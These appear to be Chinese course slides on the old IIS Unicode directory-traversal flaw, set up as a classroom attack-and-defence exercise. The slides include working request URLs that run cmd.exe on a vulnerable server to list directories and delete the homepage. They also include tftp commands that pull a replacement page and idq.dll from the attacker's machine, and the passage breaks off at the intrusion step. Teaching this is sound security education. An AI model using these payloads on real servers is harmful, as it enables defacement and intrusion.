第5讲 Web网站的Unicode攻击防范.pptVIP

第5讲 Web网站的Unicode攻击防范 企业安全需求分析 李小明是我市一家著名外资商业企业的一名网络管理员，主要负责维护公司的Web网站，其Web服务器使用Windows 2000，由于近段国外有一些不利于2008北京奥运的言论，这家公司也牵连其中，公司的网站经常受到一些不满人士的攻击，网站的主页经常被更换，因此，如何加强Web服务器的安全，成了李小明急需要解决的问题。 本讲任务 学会利用常见的漏洞分析工具分析Web网站的弱点 理解UNICODE攻击的方法 掌握Web网站的UNICODE攻击防范技术 　（每两人１组，１人主要攻击，另外１人负责防范，两人共同完成此次攻防测试任务） 　　 1.1 什么是UNICODE? UNICODE是一种字符编码方案，它用16位来表示１个字符。 微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代“/”和“\”而能利用“../”目录遍历的漏洞。 Microsoft IIS 5.0+Microsoft Windows 2000系列版本都存要UNICODE漏洞。 1.2 Unicode漏洞的检测方法 使用扫描工具X-Scan来检测Unicode漏洞是否存在，Unicode漏洞属于IIS漏洞，所以这里只扫描IIS漏洞就可以了，X-Scan设置如图所示。 将主机添加到目标地址，扫描结果如图，只要是/scripts开头的漏洞都是Unicode漏洞。 scripts目录一般系统盘根目录下的Inetpub目录下。 在Windows的目录结构中，可以使用两个点和一个斜线“../”来访问上一级目录，在浏览器中利用“scripts/../../”可以访问到系统盘根目录，访问“scripts/../../winnt/system32”就访问到系统的系统目录了，在system32目录下包含许多重要的系统文件，比如cmd.exe文件，可以利用该文件新建用户，删除文件等操作。 浏览器地址栏中禁用符号“../”，但是可以使用符号“/”的Unicode的编码。比如 “/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构 在攻击测试WIN2000英文版时，可用Unicode 代码“%c0%af”取代“/”。 在攻击测试WIN2000中文版时，可用Unicode 代码“%255c”取代“/”。 UNICODE攻击的过程 相关的工具 Idq.dll文件 Ispc.exe文件 Tftp服务器软件 2.1利用Unicode漏洞读取系统盘目录 利用该漏洞读取出计算机上目录列表，比如读取C盘的目录，只要在浏览器中输入: “/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\” 2.2 利用Unicode漏洞删除主页 利用Unicode可以方便的删除对方的主页，比如现在已经知道对方网站的根路径在“C:\Initpub\wwwroot”（系统默认）下，可以删除该路径下的文件“default.asp”来删除主页，这里的“default.asp”文件是IIS的默认启动页面。 使用的语句是： /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+del+c:\inetpub\wwwroot\default.htm 2.3 利用Unicode漏洞上传文件 现在需要向对方服务器上传一个新的主页，首先在本地建立tftp服务器，为了上传这个文件，首先在本地计算机上搭建一个TFTP服务器，普通文件传输协议TFTP（Text File Transmission Protocol）一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将新的主页和tftpd32.exe放在本地的同一目录下，执行tftpd32.exe程序， TFTP服务器就建起来了。 这样在本地的TFTP的服务器就建立好了，保留这个窗口，通过该服务器向对方传递default.htm和另一文件idq.dll。在浏览器中执行命令： /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp+-i++get+default.htm /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp+-i++get+idq.dll 上传完毕后可以查看一下scripts目录，是否真的上传成功了。 2.5入侵对方主机 说明已经成功的在scripts目录中上传了一个idq.dll文件